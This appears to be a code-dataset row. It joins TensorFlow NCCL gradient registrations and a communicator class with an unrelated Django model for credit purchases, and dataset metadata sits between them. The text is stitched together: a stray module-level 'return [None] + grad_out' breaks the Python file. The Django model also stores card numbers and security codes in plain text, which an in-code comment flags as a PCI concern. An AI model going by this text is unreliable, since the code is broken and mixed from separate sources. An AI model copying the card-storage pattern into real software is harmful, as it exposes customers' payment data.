@ops.RegisterGradient('ReduceWithNcclComm')
def _reduce_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL reduce op: broadcast the gradient back from the root.
  '''
  if op.get_attr('reduce_op') != CollectiveOps.SUM:
    raise NotImplementedError(
      'Only reduce_op=SUM is supported for gradients computation.')
  handle = op.inputs[0]
  dy = args[0]
  root = op.get_attr('root_rank')
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.broadcast_with_nccl_comm(handle, dy, root_rank=root)
  return None, dx
@ops.RegisterGradient('ReduceScatterWithNcclComm')
def _reduce_scatter_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL reduce scatter op: allgather the incoming gradient.
  '''
  if op.get_attr('reduce_op') != CollectiveOps.SUM:
    raise NotImplementedError(
      'Only reduce_op=SUM is supported for gradients computation.')
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.allgather_with_nccl_comm(handle, dy)
  return None, dx
@ops.RegisterGradient('AllreduceWithNcclComm')
def _allreduce_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL allreduce op: another allreduce of the gradient.
  '''
  reduce_op = op.get_attr('reduce_op')
  if reduce_op != CollectiveOps.SUM:
    raise NotImplementedError(
      'Only reduce_op=SUM is supported for gradients computation.')
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.allreduce_with_nccl_comm(handle, dy, reduce_op=reduce_op)
  return None, dx
# These rooted/uneven collectives are registered as non-differentiable.
ops.NotDifferentiable('BroadcastWithNcclComm')
ops.NotDifferentiable('ScatterWithNcclComm')
ops.NotDifferentiable('GatherWithNcclComm')
ops.NotDifferentiable('GathervWithNcclComm')
@ops.RegisterGradient('AllgatherWithNcclComm')
def _allgather_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL allgather op: reduce-scatter (SUM) of the gradient.
  '''
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.reduce_scatter_with_nccl_comm(
        handle, dy, reduce_op=CollectiveOps.SUM)
  return None, dx
# Variable-length allgather is registered as non-differentiable.
ops.NotDifferentiable('AllgathervWithNcclComm')
@ops.RegisterGradient('AlltoallWithNcclComm')
def _alltoall_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL alltoall op: another alltoall of the gradient.
  '''
  handle, dy = op.inputs[0], args[0]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dx = _ops.alltoall_with_nccl_comm(
        handle, dy,
        wire_dtype=op.get_attr('wire_dtype'))
  return None, dx
@ops.RegisterGradient('AlltoallvWithNcclComm')
def _alltoallv_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL alltoallv op.

  The gradient of an alltoallv is another alltoallv of the incoming
  gradient, driven by the sizes emitted by the forward op
  (``op.outputs[1]``) so each rank sends back exactly what it received.
  '''
  # Renamed from _nccl_alltoallv_grad for consistency with the other
  # *_with_nccl_comm_grad functions in this module; the name is private
  # and only referenced through the RegisterGradient decorator.
  comm = op.inputs[0]
  grad_in = args[0]  # was list(args)[0]; args is already indexable
  grad_sizes_in = op.outputs[1]
  common_shape = op.get_attr('common_shape')
  wire_dtype = op.get_attr('wire_dtype')
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      grad_out, grad_sizes_out = _ops.alltoallv_with_nccl_comm(
        comm, grad_in, grad_sizes_in,
        wire_dtype=wire_dtype,
        common_shape=common_shape)
  return None, grad_out, grad_sizes_out
@ops.RegisterGradient('GroupAlltoallvWithNcclComm')
def _group_alltoallv_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL group_alltoallv op.
  '''
  handle = op.inputs[0]
  num_columns = op.get_attr('num_columns')
  # First num_columns entries of args are the per-column gradients; the
  # forward op's trailing outputs carry the sizes to route them back.
  dys = args[:num_columns]
  dy_sizes = op.outputs[num_columns:]
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dxs, _ = _ops.group_alltoallv_with_nccl_comm(
        handle, dys, dy_sizes,
        wire_dtype=op.get_attr('wire_dtype'),
        common_shapes=op.get_attr('common_shapes'))
  # One None for the comm handle, then the gradients, then None per size input.
  return (None,) + tuple(dxs) + (None,) * num_columns
@ops.RegisterGradient('AlltoallwWithNcclComm')
def _alltoallw_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL alltoallw op: alltoallw of the incoming gradients.
  '''
  handle = op.inputs[0]
  dys = list(args)
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dxs = _ops.alltoallw_with_nccl_comm(
        handle, dys,
        wire_dtype=op.get_attr('wire_dtype'),
        common_shape=op.get_attr('common_shape'))
  return [None] + dxs
@ops.RegisterGradient('GroupAlltoallwWithNcclComm')
def _group_alltoallw_with_nccl_comm_grad(op, *args):
  r'''Gradient for NCCL group_alltoallw op.
  '''
  handle = op.inputs[0]
  dys = list(args)
  with ops.device(op.device):
    with ops.control_dependencies(op.outputs):
      dxs = _ops.group_alltoallw_with_nccl_comm(
        handle, dys,
        num_columns=op.get_attr('num_columns'),
        wire_dtype=op.get_attr('wire_dtype'),
        common_shapes=op.get_attr('common_shapes'))
  return [None] + dxs
return [None] + grad_out
class NcclCommunicator(Communicator):
  r'''A communicator using NCCL.

  Implements the ``Communicator`` collective primitives by delegating to the
  NCCL kernels in ``hybridbackend.tensorflow.pywrap._ops``. Collectives with
  no delegation here (scatter/gather/gatherv) raise ``NotImplementedError``.
  '''
  # Registry key for this communicator implementation.
  NAME = 'NCCL'

  @classmethod
  def compute_pool_capacity(cls, capacity=None):
    # Pooling more than one communicator is unsafe; warn but honor the
    # requested capacity, defaulting to 1.
    if capacity is not None and capacity != 1:
      logging.warning('Multiple-communicators pooling is unsafe.')
    return capacity or 1

  def _build_handle(self):
    # Resource handle for the underlying NCCL communicator.
    return _ops.nccl_comm_handle_op(shared_name=self.shared_name)

  def _build_create_op(self):
    # The 128-byte NCCL unique id (16 x int64) is distributed to all devices
    # through PubSub before creating the communicator.
    # NOTE(review): which device generates the id is decided inside PubSub --
    # confirm against the pubsub module if it matters for debugging.
    nccl_id = PubSub(self.devices)(
      _ops.get_nccl_id,
      tensor_shape.TensorShape([16]),  # 128 / 8
      dtypes.int64,
      name=f'{self.shared_name}/nccl_id')
    return _ops.create_nccl_comm(
      self.handle, nccl_id,
      size=self.size,
      rank=self.rank,
      shared_name=self.shared_name)

  def _build_is_initialized_op(self):
    return _ops.is_nccl_comm_initialized(self.handle)

  # Thin delegations to the NCCL kernels; each forwards its arguments
  # unchanged together with the communicator handle.
  def _reduce(self, value, reduce_op, root_rank, name):
    return _ops.reduce_with_nccl_comm(
      self.handle, value,
      reduce_op=reduce_op,
      root_rank=root_rank,
      name=name)

  def _reduce_scatter(self, value, reduce_op, name):
    return _ops.reduce_scatter_with_nccl_comm(
      self.handle, value,
      reduce_op=reduce_op,
      name=name)

  def _allreduce(self, value, reduce_op, name):
    return _ops.allreduce_with_nccl_comm(
      self.handle, value,
      reduce_op=reduce_op,
      name=name)

  def _broadcast(self, value, root_rank, name):
    return _ops.broadcast_with_nccl_comm(
      self.handle, value,
      root_rank=root_rank,
      name=name)

  # Not supported by this communicator.
  def _scatter(self, value, root_rank, name):
    raise NotImplementedError

  def _gather(self, value, root_rank, name):
    raise NotImplementedError

  def _gatherv(self, value, root_rank, name):
    raise NotImplementedError

  def _allgather(self, value, name):
    return _ops.allgather_with_nccl_comm(self.handle, value, name=name)

  def _allgatherv(self, value, name):
    return _ops.allgatherv_with_nccl_comm(self.handle, value, name=name)

  def _alltoall(self, value, wire_dtype, name, **kwargs):
    return _ops.alltoall_with_nccl_comm(
      self.handle, value,
      wire_dtype=wire_dtype,
      name=name)

  def _alltoallv(self, value, sizes, wire_dtype, common_shape, name, **kwargs):
    return _ops.alltoallv_with_nccl_comm(
      self.handle, value, sizes,
      common_shape=common_shape,
      wire_dtype=wire_dtype,
      name=name)

  def _group_alltoallv(
      self, values, sizes, wire_dtype, common_shapes, name, **kwargs):
    return _ops.group_alltoallv_with_nccl_comm(
      self.handle, values, sizes,
      common_shapes=common_shapes,
      wire_dtype=wire_dtype,
      name=name)

  def _alltoallw(self, values, wire_dtype, common_shape, name, **kwargs):
    return _ops.alltoallw_with_nccl_comm(
      self.handle, values,
      common_shape=common_shape,
      wire_dtype=wire_dtype,
      name=name)

  def _group_alltoallw(
      self, group_values, wire_dtype, common_shapes, name, **kwargs):
    # Flatten the per-column value lists into a single kernel call, then
    # regroup the flat results into chunks of self.size tensors per column.
    # NOTE(review): uses self._handle directly while sibling methods use
    # self.handle, and the `name` argument is unused here -- confirm intended.
    flatten_results = _ops.group_alltoallw_with_nccl_comm(
      self._handle,
      sum(group_values, []),
      num_columns=len(group_values),
      wire_dtype=wire_dtype,
      common_shapes=common_shapes)
    results = []
    for v in flatten_results:
      if results and len(results[-1]) < self.size:
        results[-1].append(v)
      else:
        results.append([v])
    return results


# Make the NCCL implementation available through the Communicator registry.
Communicator.register(NcclCommunicator)
| 2,788 | 0 | 449 |
e109bc196fb1f2d1fb3f57f50d8c167eee60e087 | 1,334 | py | Python | cielo/models.py | CharlesTenorio/strive_api | 27650f36df56d9ea3299bafa9e077f58ce68368c | [
"MIT"
] | null | null | null | cielo/models.py | CharlesTenorio/strive_api | 27650f36df56d9ea3299bafa9e077f58ce68368c | [
"MIT"
] | 7 | 2019-08-22T23:45:07.000Z | 2021-06-09T18:17:44.000Z | cielo/models.py | CharlesTenorio/strive_api | 27650f36df56d9ea3299bafa9e077f58ce68368c | [
"MIT"
] | null | null | null | from django.db import models
# Card-brand choices for CharField(choices=...): (stored value, display label).
# Fix: the original tuple listed ('American Express', 'American Express') twice.
BANDEIRA_CHOICES = (
    ('Visa', 'Visa'),
    ('Master', 'Master'),
    ('Hipercard', 'Hipercard'),
    ('Hiper', 'Hiper'),
    ('American Express', 'American Express'),
    ('Elo', 'Elo'),
    ('Diners Club', 'Diners Club'),
    ('Discover', 'Discover'),
    ('JCB', 'JCB'),
    ('Aura', 'Aura'),
)
| 40.424242 | 89 | 0.663418 | from django.db import models
# Card-brand choices for CharField(choices=...): (stored value, display label).
# Fix: the original tuple listed ('American Express', 'American Express') twice.
BANDEIRA_CHOICES = (
    ('Visa', 'Visa'),
    ('Master', 'Master'),
    ('Hipercard', 'Hipercard'),
    ('Hiper', 'Hiper'),
    ('American Express', 'American Express'),
    ('Elo', 'Elo'),
    ('Diners Club', 'Diners Club'),
    ('Discover', 'Discover'),
    ('JCB', 'JCB'),
    ('Aura', 'Aura'),
)
class ComprarCredito(models.Model):
    """Credit purchase record: card details plus the resulting transaction state."""
    # NOTE(review): card number and security code are stored in plain text
    # here -- a PCI-DSS concern; confirm whether tokenization is intended.
    id_compra = models.PositiveIntegerField(default=10, blank=True, null=True)  # purchase identifier
    cliente = models.CharField(max_length=80, blank=True, null=True)  # customer name
    numero_cartao = models.CharField(max_length=50, blank=True, null=True)  # card number
    seguranca = models.CharField(max_length=10, blank=True, null=True)  # card security code
    bandeira = models.CharField(max_length=80, choices=BANDEIRA_CHOICES)  # card brand
    validade = models.CharField(max_length=8, null=True, blank=True)  # card expiry (free-form string)
    valor = models.PositiveIntegerField(default=100, blank=True, null=True)  # purchase amount
    qtd_parcela = models.PositiveIntegerField(default=1, blank=True, null=True)  # number of installments
    codigo_trasacao = models.CharField(max_length=80, default='0', blank=True, null=True)  # transaction code
    statu_trasacao = models.CharField(max_length=300, blank=True, null=True)  # transaction status text
    data_compra = models.DateTimeField(auto_now_add=True)  # set once on creation

    class Meta:
        # Newest purchases first.
        ordering = ('-data_compra',)
| 0 | 885 | 23 |